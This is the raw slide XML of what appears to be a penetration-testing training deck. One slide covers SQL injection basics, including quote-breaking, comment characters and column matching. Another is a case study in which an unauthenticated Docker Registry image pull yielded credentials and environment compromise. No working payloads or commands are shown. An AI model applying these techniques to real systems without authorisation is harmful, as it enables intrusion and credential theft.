              <a:gd name="connsiteX26" fmla="*/ 3583404 w 6239746"/>
              <a:gd name="connsiteY26" fmla="*/ 256079 h 1194250"/>
              <a:gd name="connsiteX27" fmla="*/ 3812004 w 6239746"/>
              <a:gd name="connsiteY27" fmla="*/ 186505 h 1194250"/>
              <a:gd name="connsiteX28" fmla="*/ 3871639 w 6239746"/>
              <a:gd name="connsiteY28" fmla="*/ 464801 h 1194250"/>
              <a:gd name="connsiteX29" fmla="*/ 4169813 w 6239746"/>
              <a:gd name="connsiteY29" fmla="*/ 37418 h 1194250"/>
              <a:gd name="connsiteX30" fmla="*/ 4189691 w 6239746"/>
              <a:gd name="connsiteY30" fmla="*/ 285897 h 1194250"/>
              <a:gd name="connsiteX31" fmla="*/ 4354299 w 6239746"/>
              <a:gd name="connsiteY31" fmla="*/ 0 h 1194250"/>
              <a:gd name="connsiteX32" fmla="*/ 4398803 w 6239746"/>
              <a:gd name="connsiteY32" fmla="*/ 0 h 1194250"/>
              <a:gd name="connsiteX33" fmla="*/ 4507743 w 6239746"/>
              <a:gd name="connsiteY33" fmla="*/ 226262 h 1194250"/>
              <a:gd name="connsiteX34" fmla="*/ 4825796 w 6239746"/>
              <a:gd name="connsiteY34" fmla="*/ 67236 h 1194250"/>
              <a:gd name="connsiteX35" fmla="*/ 4865552 w 6239746"/>
              <a:gd name="connsiteY35" fmla="*/ 216323 h 1194250"/>
              <a:gd name="connsiteX36" fmla="*/ 4994761 w 6239746"/>
              <a:gd name="connsiteY36" fmla="*/ 156688 h 1194250"/>
              <a:gd name="connsiteX37" fmla="*/ 5004700 w 6239746"/>
              <a:gd name="connsiteY37" fmla="*/ 365410 h 1194250"/>
              <a:gd name="connsiteX38" fmla="*/ 5177789 w 6239746"/>
              <a:gd name="connsiteY38" fmla="*/ 0 h 1194250"/>
              <a:gd name="connsiteX39" fmla="*/ 5299008 w 6239746"/>
              <a:gd name="connsiteY39" fmla="*/ 0 h 1194250"/>
              <a:gd name="connsiteX40" fmla="*/ 5312813 w 6239746"/>
              <a:gd name="connsiteY40" fmla="*/ 106992 h 1194250"/>
              <a:gd name="connsiteX41" fmla="*/ 5312813 w 6239746"/>
              <a:gd name="connsiteY41" fmla="*/ 266018 h 1194250"/>
              <a:gd name="connsiteX42" fmla="*/ 5680561 w 6239746"/>
              <a:gd name="connsiteY42" fmla="*/ 106992 h 1194250"/>
              <a:gd name="connsiteX43" fmla="*/ 5750135 w 6239746"/>
              <a:gd name="connsiteY43" fmla="*/ 295836 h 1194250"/>
              <a:gd name="connsiteX44" fmla="*/ 5986804 w 6239746"/>
              <a:gd name="connsiteY44" fmla="*/ 0 h 1194250"/>
              <a:gd name="connsiteX45" fmla="*/ 5988440 w 6239746"/>
              <a:gd name="connsiteY45" fmla="*/ 0 h 1194250"/>
              <a:gd name="connsiteX46" fmla="*/ 5958856 w 6239746"/>
              <a:gd name="connsiteY46" fmla="*/ 295836 h 1194250"/>
              <a:gd name="connsiteX47" fmla="*/ 6219192 w 6239746"/>
              <a:gd name="connsiteY47" fmla="*/ 0 h 1194250"/>
              <a:gd name="connsiteX48" fmla="*/ 6239746 w 6239746"/>
              <a:gd name="connsiteY48" fmla="*/ 0 h 1194250"/>
              <a:gd name="connsiteX49" fmla="*/ 6239746 w 6239746"/>
              <a:gd name="connsiteY49" fmla="*/ 1194250 h 1194250"/>
              <a:gd name="connsiteX50" fmla="*/ 0 w 6239746"/>
              <a:gd name="connsiteY50" fmla="*/ 1194250 h 1194250"/>
              <a:gd name="connsiteX51" fmla="*/ 0 w 6239746"/>
              <a:gd name="connsiteY51" fmla="*/ 25297 h 1194250"/>
              <a:gd name="connsiteX52" fmla="*/ 164343 w 6239746"/>
              <a:gd name="connsiteY52" fmla="*/ 385288 h 11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39746" h="1194250">
                <a:moveTo>
                  <a:pt x="409527" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="515646" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="522152" y="305775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="800448" y="37418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="840204" y="246140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1061731" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1129375" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1227830" y="246140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1297404" y="415105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1585639" y="186505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1615456" y="405166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1883813" y="136810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2132291" y="226262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2292560" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2304220" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2370830" y="275958"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2559674" y="186505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2579552" y="474740"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2582865" y="511184"/>
                  <a:pt x="2577183" y="549609"/>
                  <a:pt x="2589491" y="584071"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2631898" y="702811"/>
                  <a:pt x="2629248" y="579936"/>
                  <a:pt x="2629248" y="623827"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2957239" y="126871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2937361" y="395227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3193097" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3271733" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3285230" y="236201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3543648" y="126871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3583404" y="256079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3812004" y="186505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3871639" y="464801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4169813" y="37418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4189691" y="285897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4354299" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4398803" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4507743" y="226262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4825796" y="67236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4865552" y="216323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4994761" y="156688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5004700" y="365410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5177789" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5299008" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5312813" y="106992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5312813" y="266018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5680561" y="106992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5750135" y="295836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5986804" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5988440" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5958856" y="295836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6219192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6239746" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6239746" y="1194250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1194250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="25297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164343" y="385288"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24C1B2AF-1D01-4514-A00B-139A8039425F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2986361" y="5988956"/>
            <a:ext cx="2016992"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561609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F2898-85D9-4AAF-A6D9-3B62A78B7A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0B17BE4-F439-4A57-BF90-1E9E27C8808C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Injection Part 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D5B9C01-0EEB-4071-B61F-F6CA9A97F2FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414337" y="1295400"/>
            <a:ext cx="11462923" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL servers generally behave the same but have different commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL statement parameters generally enclosed by single quotes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can trigger new statement(s)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need to know comment character for the DB. Examples: --, #, /*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also need to know how many columns are returned to most effectively get data out – if only one column is expected, need to make output match</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Group 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48B578D9-A051-4790-8D15-32898F045892}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2125687" y="4295132"/>
            <a:ext cx="8040222" cy="1638529"/>
            <a:chOff x="2125687" y="4613182"/>
            <a:chExt cx="8040222" cy="1638529"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Picture 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6F9CEC3-91BB-40AF-9820-FEA36C3189D1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2125687" y="4613182"/>
              <a:ext cx="8040222" cy="1638529"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D03833EE-9A84-4A17-AC14-8F76A6F13C97}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2833305" y="5012831"/>
              <a:ext cx="2464251" cy="4039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26621814-EC23-4C55-9CE4-27B1F0C320D7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7683599" y="5658874"/>
              <a:ext cx="2382713" cy="27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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="13" name="Straight Connector 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FB96259-8E6B-42F8-885D-AFD72B005247}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="5297556" y="5416826"/>
              <a:ext cx="2386043" cy="24204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CA5E9EF-8421-4227-B683-E673BECE07E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6285652" y="4949475"/>
              <a:ext cx="3218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anose="020B0604020202020204"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Unfiltered input</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="267473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64BD35-CFBA-4D55-9958-459CBCD567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E2EAEF7B-C69E-428F-9BA4-6C74E3D55472}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Importance of Research: Case Study</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7515725B-0689-4B18-AF05-A48151F7AD9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414337" y="1295400"/>
            <a:ext cx="6749117" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Active recon identified Docker Registry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hadn’t used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Docker Registries </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>before, went to the docs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Found API information </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Led to credentials and environment compromise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6918F31C-0B97-4CF3-9A87-9075AB7984C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="2319"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="843271" y="5492215"/>
            <a:ext cx="5178288" cy="674700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF6C2D8A-F2A4-4518-8A56-3E214E164CA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7248159" y="1295400"/>
            <a:ext cx="4454692" cy="2027261"/>
            <a:chOff x="7012357" y="516111"/>
            <a:chExt cx="4454692" cy="2027261"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 6" descr="Text&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D09684C-6480-442B-9B31-DA75F966739B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3"/>
            <a:srcRect r="59705" b="50688"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7012357" y="516111"/>
              <a:ext cx="3383974" cy="1176218"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19" name="Picture 18" descr="Graphical user interface, text, application&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA4C8DC6-72F8-4F5E-B3E6-391AACE78487}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4"/>
            <a:srcRect b="18765"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7568257" y="1002348"/>
              <a:ext cx="3299746" cy="1176218"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="38100" dir="8100000" sx="103000" sy="103000" algn="tr" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="40000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="Picture 16" descr="Text&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EFA4EF3-2D90-45B4-867C-F4F72B88D5BC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8152062" y="1606031"/>
              <a:ext cx="3314987" cy="937341"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="38100" dir="8100000" algn="tr" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="40000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 24" descr="Graphical user interface, text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{595CE4E4-3E08-4DB9-8CDF-9FBA366DB77F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7206600" y="3764565"/>
            <a:ext cx="4537811" cy="2646171"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DEC3014-6CAF-4057-A1F8-16AAECEAEB62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="381827" y="3985713"/>
            <a:ext cx="6276975" cy="1133475"/>
            <a:chOff x="381827" y="4194432"/>
            <a:chExt cx="6276975" cy="1133475"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="22" name="Picture 21" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76E3BB6B-D7CA-401A-B662-94E7D94DBE14}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="381827" y="4194432"/>
              <a:ext cx="6276975" cy="1133475"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Rectangle 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8805567D-66CD-4D95-B5E7-A17BA31A5F43}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1113183" y="5078892"/>
              <a:ext cx="914400" cy="1689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2161F0D7-99B7-4E8E-8392-D292AD35CD18}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5529589" y="4902116"/>
              <a:ext cx="914400" cy="1689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14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BBE43CD-EA16-4D33-88B5-C638E8AB27C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5685957" y="3625441"/>
            <a:ext cx="1056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Manifest</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2512C932-3D06-4EDE-98BC-F754E9FF88A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1036020" y="6106323"/>
            <a:ext cx="51782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Un-authenticated image pull, converted to </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="E6E6E6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>tarball</a:t>
            </a:r>
            <a:endPar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91AB6C55-5D08-4DF4-8CB2-A4B40AFB71AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6742657" y="3427871"/>
            <a:ext cx="517828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E6E6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Creds from identified script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
